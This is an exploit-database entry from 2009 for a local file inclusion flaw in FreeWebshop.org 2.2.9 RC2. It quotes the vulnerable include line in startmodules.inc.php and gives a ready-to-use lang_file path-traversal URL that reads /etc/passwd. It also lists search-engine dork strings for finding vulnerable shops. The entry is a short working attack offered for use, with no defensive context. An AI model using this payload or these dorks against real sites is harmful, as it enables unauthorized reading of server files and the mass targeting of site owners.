[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability
# Published : 2009-04-15
# Author : ahmadbady
# Previous Title : Job2C 4.2 (adtype) Local File Inclusion Vulnerability
# Next Title : Jamroom (index.php t) Local File Inclusion Vulnerability


=-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::FreeWebshop.org 2..2.9_R2
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /includes/startmodules.inc.php line 31;

include ("./".$lang_file);

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
xpl:
/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-

dork:
"FreeWebshop.org | This is the Footer | ??2008-2009"
"FreeWebshop.org | This is the Footer |"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-

# www.Syue.com [2009-04-15]